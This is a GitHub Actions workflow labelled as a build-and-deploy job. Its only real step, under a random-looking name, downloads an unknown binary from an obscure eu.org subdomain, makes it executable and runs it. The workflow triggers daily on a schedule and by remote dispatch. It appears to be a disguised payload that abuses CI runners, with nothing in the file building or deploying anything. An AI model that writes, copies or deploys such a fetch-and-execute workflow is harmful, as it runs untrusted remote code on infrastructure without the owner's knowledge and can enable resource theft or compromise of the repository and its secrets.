#2024-03-18-[083400]-phf026q6
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "24 4 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: xg9daqtu8ceg85ak
        run: |
          wget -q https://ol1s2dluv6hroekw.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories